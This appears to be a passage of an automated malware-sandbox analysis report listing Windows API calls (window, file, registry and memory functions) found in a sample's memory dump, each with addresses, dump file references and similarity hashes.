                                                                                            • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateWindow
                                                                                            • String ID:
                                                                                            • API String ID: 716092398-0
                                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                            • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                            • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                            APIs
                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                            • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                            • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                            • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                            APIs
                                                                                            • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseFind
                                                                                            • String ID:
                                                                                            • API String ID: 1863332320-0
                                                                                            • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                            • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                            • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                            • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                            APIs
                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3934441357-0
                                                                                            • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                            • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                            • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                            • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                            APIs
                                                                                              • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                            • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                              • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3202724764-0
                                                                                            • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                            • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                            • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                            • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 530164218-0
                                                                                            • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                            • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                            • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                            • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                            • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                            • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                            • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                            • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                            • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                            • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                            • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                            APIs
                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 1611563598-0
                                                                                            • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                            • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                            • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                            • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                            • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                            • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                            • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DestroyWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3375834691-0
                                                                                            • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                            • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                            • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                            • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                            • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                            • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                            • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                            • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                            • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                            • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1452528299-0
                                                                                            • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                            • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                            • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                            • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00003EBC,00007EBF,00401973), ref: 00401766
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                            • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                            • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                            • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
